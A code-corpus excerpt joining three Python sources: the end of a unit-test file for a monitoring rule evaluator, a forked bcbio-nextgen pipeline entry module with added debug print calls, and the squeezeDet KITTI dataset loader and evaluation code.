result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_UNKNOWN,
'message': 'Unknown Message',
'hysteresis': RESULT_OK
}
self.assertEqual(
result['triggers'][0]['result'], expected
)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
@mock.patch.object(GraphiteResult, 'build_meta')
def test_evaluate_successful_graphite_result(self, mock_build_meta, stats):
rule = 'check.values > 6'
plugin_results = [
GraphiteResult('check', {'bunny.a': [1, 2, 3], 'bunny.b': [4, 5]}),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected_result = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK
}
expected_meta = {
'links': {
'trigger_url': {'href': 'http://some.url', 'type': 'link'}
}
}
self.assertEqual(result['triggers'][0]['result'], expected_result)
self.assertEqual(result['triggers'][0]['meta'], expected_meta)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
@mock.patch.object(GraphiteResult, 'build_meta')
def test_evaluate_failed_graphite_result(self, mock_build_meta, stats):
rule = 'check.values > 2'
plugin_results = [
GraphiteResult(
'check',
OrderedDict([('bunny.a', [1, 2, 3]), ('bunny.b', [4, 5])])
),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected_result = {
'status': RESULT_FAILED,
'message': 'Check failed for rule `check.values > 2` which '
"evaluates to `{'bunny.a': [3], 'bunny.b': [4, 5]}`",
'hysteresis': RESULT_OK
}
expected_meta = {
'failed_metrics': {'bunny.a': [3], 'bunny.b': [4, 5]},
'links': {
'trigger_url': {'href': 'http://some.url', 'type': 'link'}
}
}
self.assertEqual(result['triggers'][0]['result'], expected_result)
self.assertEqual(result['triggers'][0]['meta'], expected_meta)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_successful_prometheus_result(self, stats):
rule = 'check.values > 2'
plugin_results = [
PrometheusResult(
'check',
{(('__name__', 'metric1'),): [0, 1]},
RESULT_OK, '', 2
),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_failed_prometheus_result(self, stats):
rule = 'check.values > 2'
plugin_results = [
PrometheusResult(
'check',
{(('__name__', 'metric1'),): [1, 2, 3]},
RESULT_OK, '', 2
),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected_result = {
'status': RESULT_FAILED,
'message': (
'Check failed for rule `check.values > 2` '
'which evaluates to `{((\'__name__\', \'metric1\'),): [3]}`'
),
'hysteresis': RESULT_OK
}
expected_meta = {
'failed_metrics': {"(('__name__', 'metric1'),)": [3]},
'links': {
'trigger_url': {'href': 'http://some.url', 'type': 'link'}
}
}
self.assertEqual(result['triggers'][0]['result'], expected_result)
self.assertEqual(result['triggers'][0]['meta'], expected_meta)
| apache-2.0 | 7,516,206,015,066,631,000 | 36.251323 | 79 | 0.550884 | false |
vladsaveliev/bcbio-nextgen | bcbio/pipeline/main.py | 1 | 27548 | """Main entry point for distributed next-gen sequencing pipelines.
Handles running the full pipeline based on instructions
"""
from __future__ import print_function
from collections import defaultdict
import copy
import os
import sys
import resource
import tempfile
import toolz as tz
from bcbio import log, heterogeneity, hla, structural, utils
from bcbio.cwl.inspect import initialize_watcher
from bcbio.distributed import prun
from bcbio.distributed.transaction import tx_tmpdir
from bcbio.log import logger, DEFAULT_LOG_DIR
from bcbio.ngsalign import alignprep
from bcbio.pipeline import datadict as dd
from bcbio.pipeline import (archive, config_utils, disambiguate, region,
run_info, qcsummary, rnaseq)
from bcbio.provenance import profile, system
from bcbio.variation import (ensemble, genotype, population, validate, joint,
peddy)
from bcbio.chipseq import peaks, atac
def run_main(workdir, config_file=None, fc_dir=None, run_info_yaml=None,
parallel=None, workflow=None):
"""Run variant analysis, handling command line options.
"""
# Set environment to standard to use periods for decimals and avoid localization
locale_to_use = utils.get_locale()
os.environ["LC_ALL"] = locale_to_use
os.environ["LC"] = locale_to_use
os.environ["LANG"] = locale_to_use
workdir = utils.safe_makedir(os.path.abspath(workdir))
os.chdir(workdir)
config, config_file = config_utils.load_system_config(config_file, workdir)
parallel = log.create_base_logger(config, parallel)
log.setup_local_logging(config, parallel)
logger.info(f"System YAML configuration: {os.path.abspath(config_file)}.")
logger.info(f"Locale set to {locale_to_use}.")
if config.get("log_dir", None) is None:
config["log_dir"] = os.path.join(workdir, DEFAULT_LOG_DIR)
if parallel["type"] in ["local", "clusterk"]:
_setup_resources()
_run_toplevel(config, config_file, workdir, parallel,
fc_dir, run_info_yaml)
elif parallel["type"] == "ipython":
assert parallel["scheduler"] is not None, "IPython parallel requires a specified scheduler (-s)"
if parallel["scheduler"] != "sge":
assert parallel["queue"] is not None, "IPython parallel requires a specified queue (-q)"
elif not parallel["queue"]:
parallel["queue"] = ""
_run_toplevel(config, config_file, workdir, parallel,
fc_dir, run_info_yaml)
else:
raise ValueError("Unexpected type of parallel run: %s" % parallel["type"])
def _setup_resources():
"""Attempt to increase resource limits up to hard limits.
This allows us to avoid out of file handle limits where we can
move beyond the soft limit up to the hard limit.
"""
target_procs = 10240
cur_proc, max_proc = resource.getrlimit(resource.RLIMIT_NPROC)
target_proc = min(max_proc, target_procs) if max_proc > 0 else target_procs
resource.setrlimit(resource.RLIMIT_NPROC, (max(cur_proc, target_proc), max_proc))
cur_hdls, max_hdls = resource.getrlimit(resource.RLIMIT_NOFILE)
target_hdls = min(max_hdls, target_procs) if max_hdls > 0 else target_procs
resource.setrlimit(resource.RLIMIT_NOFILE, (max(cur_hdls, target_hdls), max_hdls))
def _run_toplevel(config, config_file, work_dir, parallel,
fc_dir=None, run_info_yaml=None):
"""
Run toplevel analysis, processing a set of input files.
config_file -- Main YAML configuration file with system parameters
fc_dir -- Directory of fastq files to process
run_info_yaml -- YAML configuration file specifying inputs to process
"""
dirs = run_info.setup_directories(work_dir, fc_dir, config, config_file)
config_file = os.path.join(dirs["config"], os.path.basename(config_file))
pipelines, config = _pair_samples_with_pipelines(run_info_yaml, config)
system.write_info(dirs, parallel, config)
with tx_tmpdir(config if parallel.get("type") == "local" else None) as tmpdir:
tempfile.tempdir = tmpdir
for pipeline, samples in pipelines.items():
for xs in pipeline(config, run_info_yaml, parallel, dirs, samples):
pass
# ## Generic pipeline framework
def _wres(parallel, progs, fresources=None, ensure_mem=None):
"""Add resource information to the parallel environment on required programs and files.
Enables spinning up required machines and operating in non-shared filesystem
environments.
progs -- Third party tools used in processing
fresources -- Required file-based resources needed. These will be transferred on non-shared
filesystems.
ensure_mem -- Dictionary of required minimum memory for programs used. Ensures
enough memory gets allocated on low-core machines.
"""
parallel = copy.deepcopy(parallel)
parallel["progs"] = progs
if fresources:
parallel["fresources"] = fresources
if ensure_mem:
parallel["ensure_mem"] = ensure_mem
return parallel
def variant2pipeline(config, run_info_yaml, parallel, dirs, samples):
## Alignment and preparation requiring the entire input file (multicore cluster)
# Assign GATK supplied memory if required for post-process recalibration
align_programs = ["aligner", "samtools", "sambamba"]
if any(tz.get_in(["algorithm", "recalibrate"], utils.to_single_data(d)) in [True, "gatk"] for d in samples):
align_programs.append("gatk")
with prun.start(_wres(parallel, align_programs,
(["reference", "fasta"], ["reference", "aligner"], ["files"])),
samples, config, dirs, "multicore",
multiplier=alignprep.parallel_multiplier(samples)) as run_parallel:
with profile.report("organize samples", dirs):
samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml,
[x[0]["description"] for x in samples]]])
with profile.report("alignment preparation", dirs):
samples = run_parallel("prep_align_inputs", samples)
samples = run_parallel("disambiguate_split", [samples])
with profile.report("alignment", dirs):
samples = run_parallel("process_alignment", samples)
samples = disambiguate.resolve(samples, run_parallel)
samples = alignprep.merge_split_alignments(samples, run_parallel)
with profile.report("callable regions", dirs):
samples = run_parallel("prep_samples", [samples])
samples = run_parallel("postprocess_alignment", samples)
samples = run_parallel("combine_sample_regions", [samples])
samples = run_parallel("calculate_sv_bins", [samples])
samples = run_parallel("calculate_sv_coverage", samples)
samples = run_parallel("normalize_sv_coverage", [samples])
samples = region.clean_sample_data(samples)
with profile.report("hla typing", dirs):
samples = hla.run(samples, run_parallel)
## Variant calling on sub-regions of the input file (full cluster)
with prun.start(_wres(parallel, ["gatk", "picard", "variantcaller"]),
samples, config, dirs, "full",
multiplier=region.get_max_counts(samples), max_multicore=1) as run_parallel:
with profile.report("alignment post-processing", dirs):
samples = region.parallel_prep_region(samples, run_parallel)
with profile.report("variant calling", dirs):
samples = genotype.parallel_variantcall_region(samples, run_parallel)
STEP(samples)
with profile.report("joint squaring off/backfilling", dirs):
samples = joint.square_off(samples, run_parallel)
## Finalize variants, BAMs and population databases (per-sample multicore cluster)
with prun.start(_wres(parallel, ["gatk", "gatk-vqsr", "snpeff", "bcbio_variation",
"gemini", "samtools", "fastqc", "sambamba",
"bcbio-variation-recall", "qsignature",
"svcaller", "kraken", "preseq"]),
samples, config, dirs, "multicore2",
multiplier=structural.parallel_multiplier(samples)) as run_parallel:
with profile.report("variant post-processing", dirs):
samples = run_parallel("postprocess_variants", samples)
STEP(samples)
samples = run_parallel("split_variants_by_sample", samples)
with profile.report("prepped BAM merging", dirs):
samples = region.delayed_bamprep_merge(samples, run_parallel)
with profile.report("validation", dirs):
samples = run_parallel("compare_to_rm", samples)
samples = genotype.combine_multiple_callers(samples)
with profile.report("ensemble calling", dirs):
samples = ensemble.combine_calls_parallel(samples, run_parallel)
STEP(samples)
with profile.report("validation summary", dirs):
samples = validate.summarize_grading(samples)
with profile.report("structural variation", dirs):
samples = structural.run(samples, run_parallel, "initial")
STEP(samples)
with profile.report("structural variation", dirs):
samples = structural.run(samples, run_parallel, "standard")
STEP(samples)
with profile.report("structural variation ensemble", dirs):
samples = structural.run(samples, run_parallel, "ensemble")
STEP(samples)
with profile.report("structural variation validation", dirs):
samples = run_parallel("validate_sv", samples)
STEP(samples)
with profile.report("heterogeneity", dirs):
samples = heterogeneity.run(samples, run_parallel)
STEP(samples)
with profile.report("population database", dirs):
samples = population.prep_db_parallel(samples, run_parallel)
STEP(samples)
with profile.report("peddy check", dirs):
samples = peddy.run_peddy_parallel(samples, run_parallel)
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
STEP(samples)
with profile.report("archive", dirs):
samples = archive.compress(samples, run_parallel)
STEP(samples)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for sample in samples:
run_parallel("upload_samples_project", [sample])
logger.info("Timing: finished")
return samples
def _debug_samples(i, samples):
print("---", i, len(samples))
for sample in (utils.to_single_data(x) for x in samples):
print(" ", sample["description"], sample.get("region"), \
utils.get_in(sample, ("config", "algorithm", "variantcaller")), \
utils.get_in(sample, ("config", "algorithm", "jointcaller")), \
utils.get_in(sample, ("metadata", "batch")), \
[x.get("variantcaller") for x in sample.get("variants", [])], \
sample.get("work_bam"), \
sample.get("vrn_file"))
def STEP(samples, title=None):
if title:
print(title + ':')
import pprint
pprint.pprint([(s[0]['description'], s[0]['metadata']['phenotype'], str(s[0]['config']['algorithm']['qc'])) for s in samples])
def standardpipeline(config, run_info_yaml, parallel, dirs, samples):
## Alignment and preparation requiring the entire input file (multicore cluster)
with prun.start(_wres(parallel, ["aligner", "samtools", "sambamba"]),
samples, config, dirs, "multicore") as run_parallel:
with profile.report("organize samples", dirs):
samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml,
[x[0]["description"] for x in samples]]])
with profile.report("alignment", dirs):
samples = run_parallel("process_alignment", samples)
with profile.report("callable regions", dirs):
samples = run_parallel("prep_samples", [samples])
samples = run_parallel("postprocess_alignment", samples)
samples = run_parallel("combine_sample_regions", [samples])
samples = region.clean_sample_data(samples)
## Quality control
with prun.start(_wres(parallel, ["fastqc", "qsignature", "kraken", "gatk", "samtools", "preseq"]),
samples, config, dirs, "multicore2") as run_parallel:
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for sample in samples:
run_parallel("upload_samples_project", [sample])
logger.info("Timing: finished")
return samples
def rnaseqpipeline(config, run_info_yaml, parallel, dirs, samples):
samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples)
with prun.start(_wres(parallel, ["aligner", "picard", "samtools"],
ensure_mem={"tophat": 10, "tophat2": 10, "star": 2, "hisat2": 8}),
samples, config, dirs, "alignment",
multiplier=alignprep.parallel_multiplier(samples)) as run_parallel:
with profile.report("alignment", dirs):
samples = run_parallel("disambiguate_split", [samples])
samples = run_parallel("process_alignment", samples)
with prun.start(_wres(parallel, ["samtools", "cufflinks"]),
samples, config, dirs, "rnaseqcount") as run_parallel:
with profile.report("disambiguation", dirs):
samples = disambiguate.resolve(samples, run_parallel)
with profile.report("transcript assembly", dirs):
samples = rnaseq.assemble_transcripts(run_parallel, samples)
with profile.report("estimate expression (threaded)", dirs):
samples = rnaseq.quantitate_expression_parallel(samples, run_parallel)
with prun.start(_wres(parallel, ["dexseq", "express"]), samples, config,
dirs, "rnaseqcount-singlethread", max_multicore=1) as run_parallel:
with profile.report("estimate expression (single threaded)", dirs):
samples = rnaseq.quantitate_expression_noparallel(samples, run_parallel)
samples = rnaseq.combine_files(samples)
with prun.start(_wres(parallel, ["gatk", "vardict"]), samples, config,
dirs, "rnaseq-variation") as run_parallel:
with profile.report("RNA-seq variant calling", dirs):
samples = rnaseq.rnaseq_variant_calling(samples, run_parallel)
with prun.start(_wres(parallel, ["samtools", "fastqc", "qualimap",
"kraken", "gatk", "preseq"], ensure_mem={"qualimap": 4}),
samples, config, dirs, "qc") as run_parallel:
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for sample in samples:
run_parallel("upload_samples_project", [sample])
with profile.report("bcbioRNAseq loading", dirs):
tools_on = dd.get_in_samples(samples, dd.get_tools_on)
bcbiornaseq_on = tools_on and "bcbiornaseq" in tools_on
if bcbiornaseq_on and len(samples) < 3:
logger.warn("bcbioRNASeq needs at least three samples total, skipping.")
else:
run_parallel("run_bcbiornaseqload", [sample])
logger.info("Timing: finished")
return samples
def fastrnaseqpipeline(config, run_info_yaml, parallel, dirs, samples):
samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples)
ww = initialize_watcher(samples)
with prun.start(_wres(parallel, ["samtools"]), samples, config,
dirs, "fastrnaseq") as run_parallel:
with profile.report("fastrnaseq", dirs):
samples = rnaseq.fast_rnaseq(samples, run_parallel)
ww.report("fastrnaseq", samples)
samples = rnaseq.combine_files(samples)
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
ww.report("qcsummary", samples)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for samples in samples:
run_parallel("upload_samples_project", [samples])
logger.info("Timing: finished")
return samples
def singlecellrnaseqpipeline(config, run_info_yaml, parallel, dirs, samples):
samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples)
with prun.start(_wres(parallel, ["samtools", "rapmap"]), samples, config,
dirs, "singlecell-rnaseq") as run_parallel:
with profile.report("singlecell-rnaseq", dirs):
samples = rnaseq.singlecell_rnaseq(samples, run_parallel)
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for samples in samples:
run_parallel("upload_samples_project", [samples])
logger.info("Timing: finished")
return samples
def smallrnaseqpipeline(config, run_info_yaml, parallel, dirs, samples):
# causes a circular import at the top level
from bcbio.srna.group import report as srna_report
samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples)
with prun.start(_wres(parallel, ["aligner", "picard", "samtools"],
ensure_mem={"bowtie": 8, "bowtie2": 8, "star": 2}),
[samples[0]], config, dirs, "alignment") as run_parallel:
with profile.report("prepare", dirs):
samples = run_parallel("seqcluster_prepare", [samples])
with profile.report("seqcluster alignment", dirs):
samples = run_parallel("srna_alignment", [samples])
with prun.start(_wres(parallel, ["aligner", "picard", "samtools"],
ensure_mem={"tophat": 10, "tophat2": 10, "star": 2, "hisat2": 8}),
samples, config, dirs, "alignment_samples",
multiplier=alignprep.parallel_multiplier(samples)) as run_parallel:
with profile.report("alignment", dirs):
samples = run_parallel("process_alignment", samples)
with prun.start(_wres(parallel, ["picard", "miraligner"]),
samples, config, dirs, "annotation") as run_parallel:
with profile.report("small RNA annotation", dirs):
samples = run_parallel("srna_annotation", samples)
with prun.start(_wres(parallel, ["seqcluster", "mirge"],
ensure_mem={"seqcluster": 8}),
[samples[0]], config, dirs, "cluster") as run_parallel:
with profile.report("cluster", dirs):
samples = run_parallel("seqcluster_cluster", [samples])
with prun.start(_wres(parallel, ["picard", "fastqc"]),
samples, config, dirs, "qc") as run_parallel:
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
with profile.report("report", dirs):
srna_report(samples)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for sample in samples:
run_parallel("upload_samples_project", [sample])
return samples
def chipseqpipeline(config, run_info_yaml, parallel, dirs, samples):
with prun.start(_wres(parallel, ["aligner", "picard"]),
samples, config, dirs, "multicore",
multiplier=alignprep.parallel_multiplier(samples)) as run_parallel:
with profile.report("organize samples", dirs):
samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml,
[x[0]["description"] for x in samples]]])
with profile.report("alignment", dirs):
samples = run_parallel("prepare_sample", samples)
samples = run_parallel("trim_sample", samples)
samples = run_parallel("disambiguate_split", [samples])
samples = run_parallel("process_alignment", samples)
with profile.report("disambiguation", dirs):
samples = disambiguate.resolve(samples, run_parallel)
samples = run_parallel("clean_chipseq_alignment", samples)
with prun.start(_wres(parallel, ["peakcaller"]),
samples, config, dirs, "peakcalling",
multiplier = peaks._get_multiplier(samples)) as run_parallel:
with profile.report("peakcalling", dirs):
samples = peaks.peakcall_prepare(samples, run_parallel)
samples = peaks.call_consensus(samples)
samples = run_parallel("run_chipseq_count", samples)
samples = peaks.create_peaktable(samples)
with prun.start(_wres(parallel, ["picard", "fastqc"]),
samples, config, dirs, "qc") as run_parallel:
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
samples = atac.create_ataqv_report(samples)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for sample in samples:
run_parallel("upload_samples_project", [sample])
logger.info("Timing: finished")
return samples
def wgbsseqpipeline(config, run_info_yaml, parallel, dirs, samples):
with prun.start(_wres(parallel, ["fastqc", "picard"], ensure_mem={"fastqc" : 4}),
samples, config, dirs, "trimming") as run_parallel:
with profile.report("organize samples", dirs):
samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml,
[x[0]["description"] for x in samples]]])
samples = run_parallel("prepare_sample", samples)
samples = run_parallel("trim_bs_sample", samples)
with prun.start(_wres(parallel, ["aligner", "bismark", "picard", "samtools"]),
samples, config, dirs, "multicore",
multiplier=alignprep.parallel_multiplier(samples)) as run_parallel:
with profile.report("alignment", dirs):
samples = run_parallel("process_alignment", samples)
with prun.start(_wres(parallel, ['samtools']), samples, config, dirs,
'deduplication') as run_parallel:
with profile.report('deduplicate', dirs):
samples = run_parallel('deduplicate_bismark', samples)
with prun.start(_wres(parallel, ["caller"], ensure_mem={"caller": 5}),
samples, config, dirs, "multicore2",
multiplier=24) as run_parallel:
with profile.report("cpg calling", dirs):
samples = run_parallel("cpg_calling", samples)
# with prun.start(_wres(parallel, ["picard", "fastqc", "samtools"]),
# samples, config, dirs, "qc") as run_parallel:
# with profile.report("quality control", dirs):
# samples = qcsummary.generate_parallel(samples, run_parallel)
return samples
def rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples):
"""
organizes RNA-seq and small-RNAseq samples, converting from BAM if
necessary and trimming if necessary
"""
pipeline = dd.get_in_samples(samples, dd.get_analysis)
trim_reads_set = any([tz.get_in(["algorithm", "trim_reads"], d) for d in dd.sample_data_iterator(samples)])
resources = ["picard"]
needs_trimming = (_is_smallrnaseq(pipeline) or trim_reads_set)
if needs_trimming:
resources.append("atropos")
with prun.start(_wres(parallel, resources),
samples, config, dirs, "trimming",
max_multicore=1 if not needs_trimming else None) as run_parallel:
with profile.report("organize samples", dirs):
samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml,
[x[0]["description"] for x in samples]]])
samples = run_parallel("prepare_sample", samples)
if needs_trimming:
with profile.report("adapter trimming", dirs):
if _is_smallrnaseq(pipeline):
samples = run_parallel("trim_srna_sample", samples)
else:
samples = run_parallel("trim_sample", samples)
return samples
def _get_pipeline(item):
from bcbio.log import logger
analysis_type = item.get("analysis", "").lower()
if analysis_type not in SUPPORTED_PIPELINES:
logger.error("Cannot determine which type of analysis to run, "
"set in the run_info under details.")
sys.exit(1)
else:
return SUPPORTED_PIPELINES[analysis_type]
def _pair_samples_with_pipelines(run_info_yaml, config):
"""Map samples defined in input file to pipelines to run.
"""
samples = config_utils.load_config(run_info_yaml)
if isinstance(samples, dict):
resources = samples.pop("resources")
samples = samples["details"]
else:
resources = {}
ready_samples = []
for sample in samples:
if "files" in sample:
del sample["files"]
# add any resources to this item to recalculate global configuration
usample = copy.deepcopy(sample)
usample.pop("algorithm", None)
if "resources" not in usample:
usample["resources"] = {}
for prog, pkvs in resources.items():
if prog not in usample["resources"]:
usample["resources"][prog] = {}
if pkvs is not None:
for key, val in pkvs.items():
usample["resources"][prog][key] = val
config = config_utils.update_w_custom(config, usample)
sample["resources"] = {}
ready_samples.append(sample)
paired = [(x, _get_pipeline(x)) for x in ready_samples]
d = defaultdict(list)
for x in paired:
d[x[1]].append([x[0]])
return d, config
SUPPORTED_PIPELINES = {"variant2": variant2pipeline,
"snp calling": variant2pipeline,
"variant": variant2pipeline,
"standard": standardpipeline,
"minimal": standardpipeline,
"rna-seq": rnaseqpipeline,
"smallrna-seq": smallrnaseqpipeline,
"chip-seq": chipseqpipeline,
"wgbs-seq": wgbsseqpipeline,
"fastrna-seq": fastrnaseqpipeline,
"scrna-seq": singlecellrnaseqpipeline}
def _is_smallrnaseq(pipeline):
return pipeline.lower() == "smallrna-seq"
| mit | 4,928,597,947,818,260,000 | 50.204461 | 130 | 0.619864 | false |
BichenWuUCB/squeezeDet | src/dataset/kitti.py | 1 | 10284 | # Author: Bichen Wu ([email protected]) 08/25/2016
"""Image data base class for kitti"""
import cv2
import os
import numpy as np
import subprocess
from dataset.imdb import imdb
from utils.util import bbox_transform_inv, batch_iou
class kitti(imdb):
def __init__(self, image_set, data_path, mc):
imdb.__init__(self, 'kitti_'+image_set, mc)
self._image_set = image_set
self._data_root_path = data_path
self._image_path = os.path.join(self._data_root_path, 'training', 'image_2')
self._label_path = os.path.join(self._data_root_path, 'training', 'label_2')
self._classes = self.mc.CLASS_NAMES
self._class_to_idx = dict(zip(self.classes, xrange(self.num_classes)))
# a list of string indices of images in the directory
self._image_idx = self._load_image_set_idx()
# a dict of image_idx -> [[cx, cy, w, h, cls_idx]]. x,y,w,h are not divided by
# the image width and height
self._rois = self._load_kitti_annotation()
## batch reader ##
self._perm_idx = None
self._cur_idx = 0
# TODO(bichen): add a random seed as parameter
self._shuffle_image_idx()
self._eval_tool = './src/dataset/kitti-eval/cpp/evaluate_object'
def _load_image_set_idx(self):
image_set_file = os.path.join(
self._data_root_path, 'ImageSets', self._image_set+'.txt')
assert os.path.exists(image_set_file), \
'File does not exist: {}'.format(image_set_file)
with open(image_set_file) as f:
image_idx = [x.strip() for x in f.readlines()]
return image_idx
def _image_path_at(self, idx):
image_path = os.path.join(self._image_path, idx+'.png')
assert os.path.exists(image_path), \
'Image does not exist: {}'.format(image_path)
return image_path
def _load_kitti_annotation(self):
def _get_obj_level(obj):
height = float(obj[7]) - float(obj[5]) + 1
truncation = float(obj[1])
occlusion = float(obj[2])
if height >= 40 and truncation <= 0.15 and occlusion <= 0:
return 1
elif height >= 25 and truncation <= 0.3 and occlusion <= 1:
return 2
elif height >= 25 and truncation <= 0.5 and occlusion <= 2:
return 3
else:
return 4
idx2annotation = {}
for index in self._image_idx:
filename = os.path.join(self._label_path, index+'.txt')
with open(filename, 'r') as f:
lines = f.readlines()
f.close()
bboxes = []
for line in lines:
obj = line.strip().split(' ')
try:
cls = self._class_to_idx[obj[0].lower().strip()]
except:
continue
if self.mc.EXCLUDE_HARD_EXAMPLES and _get_obj_level(obj) > 3:
continue
xmin = float(obj[4])
ymin = float(obj[5])
xmax = float(obj[6])
ymax = float(obj[7])
assert xmin >= 0.0 and xmin <= xmax, \
'Invalid bounding box x-coord xmin {} or xmax {} at {}.txt' \
.format(xmin, xmax, index)
assert ymin >= 0.0 and ymin <= ymax, \
'Invalid bounding box y-coord ymin {} or ymax {} at {}.txt' \
.format(ymin, ymax, index)
x, y, w, h = bbox_transform_inv([xmin, ymin, xmax, ymax])
bboxes.append([x, y, w, h, cls])
idx2annotation[index] = bboxes
return idx2annotation
def evaluate_detections(self, eval_dir, global_step, all_boxes):
"""Evaluate detection results.
Args:
eval_dir: directory to write evaluation logs
global_step: step of the checkpoint
all_boxes: all_boxes[cls][image] = N x 5 arrays of
[xmin, ymin, xmax, ymax, score]
Returns:
aps: array of average precisions.
names: class names corresponding to each ap
"""
det_file_dir = os.path.join(
eval_dir, 'detection_files_{:s}'.format(global_step), 'data')
if not os.path.isdir(det_file_dir):
os.makedirs(det_file_dir)
for im_idx, index in enumerate(self._image_idx):
filename = os.path.join(det_file_dir, index+'.txt')
with open(filename, 'wt') as f:
for cls_idx, cls in enumerate(self._classes):
dets = all_boxes[cls_idx][im_idx]
for k in xrange(len(dets)):
f.write(
'{:s} -1 -1 0.0 {:.2f} {:.2f} {:.2f} {:.2f} 0.0 0.0 0.0 0.0 0.0 '
'0.0 0.0 {:.3f}\n'.format(
cls.lower(), dets[k][0], dets[k][1], dets[k][2], dets[k][3],
dets[k][4])
)
cmd = self._eval_tool + ' ' \
+ os.path.join(self._data_root_path, 'training') + ' ' \
+ os.path.join(self._data_root_path, 'ImageSets',
self._image_set+'.txt') + ' ' \
+ os.path.dirname(det_file_dir) + ' ' + str(len(self._image_idx))
print('Running: {}'.format(cmd))
status = subprocess.call(cmd, shell=True)
aps = []
names = []
for cls in self._classes:
det_file_name = os.path.join(
os.path.dirname(det_file_dir), 'stats_{:s}_ap.txt'.format(cls))
if os.path.exists(det_file_name):
with open(det_file_name, 'r') as f:
lines = f.readlines()
assert len(lines) == 3, \
'Line number of {} should be 3'.format(det_file_name)
aps.append(float(lines[0].split('=')[1].strip()))
aps.append(float(lines[1].split('=')[1].strip()))
aps.append(float(lines[2].split('=')[1].strip()))
else:
aps.extend([0.0, 0.0, 0.0])
names.append(cls+'_easy')
names.append(cls+'_medium')
names.append(cls+'_hard')
return aps, names
def do_detection_analysis_in_eval(self, eval_dir, global_step):
det_file_dir = os.path.join(
eval_dir, 'detection_files_{:s}'.format(global_step), 'data')
det_error_dir = os.path.join(
eval_dir, 'detection_files_{:s}'.format(global_step),
'error_analysis')
if not os.path.exists(det_error_dir):
os.makedirs(det_error_dir)
det_error_file = os.path.join(det_error_dir, 'det_error_file.txt')
stats = self.analyze_detections(det_file_dir, det_error_file)
ims = self.visualize_detections(
image_dir=self._image_path,
image_format='.png',
det_error_file=det_error_file,
output_image_dir=det_error_dir,
num_det_per_type=10
)
return stats, ims
def analyze_detections(self, detection_file_dir, det_error_file):
def _save_detection(f, idx, error_type, det, score):
f.write(
'{:s} {:s} {:.1f} {:.1f} {:.1f} {:.1f} {:s} {:.3f}\n'.format(
idx, error_type,
det[0]-det[2]/2., det[1]-det[3]/2.,
det[0]+det[2]/2., det[1]+det[3]/2.,
self._classes[int(det[4])],
score
)
)
# load detections
self._det_rois = {}
for idx in self._image_idx:
det_file_name = os.path.join(detection_file_dir, idx+'.txt')
with open(det_file_name) as f:
lines = f.readlines()
f.close()
bboxes = []
for line in lines:
obj = line.strip().split(' ')
cls = self._class_to_idx[obj[0].lower().strip()]
xmin = float(obj[4])
ymin = float(obj[5])
xmax = float(obj[6])
ymax = float(obj[7])
score = float(obj[-1])
x, y, w, h = bbox_transform_inv([xmin, ymin, xmax, ymax])
bboxes.append([x, y, w, h, cls, score])
bboxes.sort(key=lambda x: x[-1], reverse=True)
self._det_rois[idx] = bboxes
# do error analysis
num_objs = 0.
num_dets = 0.
num_correct = 0.
num_loc_error = 0.
num_cls_error = 0.
num_bg_error = 0.
num_repeated_error = 0.
num_detected_obj = 0.
with open(det_error_file, 'w') as f:
for idx in self._image_idx:
gt_bboxes = np.array(self._rois[idx])
num_objs += len(gt_bboxes)
detected = [False]*len(gt_bboxes)
det_bboxes = self._det_rois[idx]
if len(gt_bboxes) < 1:
continue
for i, det in enumerate(det_bboxes):
if i < len(gt_bboxes):
num_dets += 1
ious = batch_iou(gt_bboxes[:, :4], det[:4])
max_iou = np.max(ious)
gt_idx = np.argmax(ious)
if max_iou > 0.1:
if gt_bboxes[gt_idx, 4] == det[4]:
if max_iou >= 0.5:
if i < len(gt_bboxes):
if not detected[gt_idx]:
num_correct += 1
detected[gt_idx] = True
else:
num_repeated_error += 1
else:
if i < len(gt_bboxes):
num_loc_error += 1
_save_detection(f, idx, 'loc', det, det[5])
else:
if i < len(gt_bboxes):
num_cls_error += 1
_save_detection(f, idx, 'cls', det, det[5])
else:
if i < len(gt_bboxes):
num_bg_error += 1
_save_detection(f, idx, 'bg', det, det[5])
for i, gt in enumerate(gt_bboxes):
if not detected[i]:
_save_detection(f, idx, 'missed', gt, -1.0)
num_detected_obj += sum(detected)
f.close()
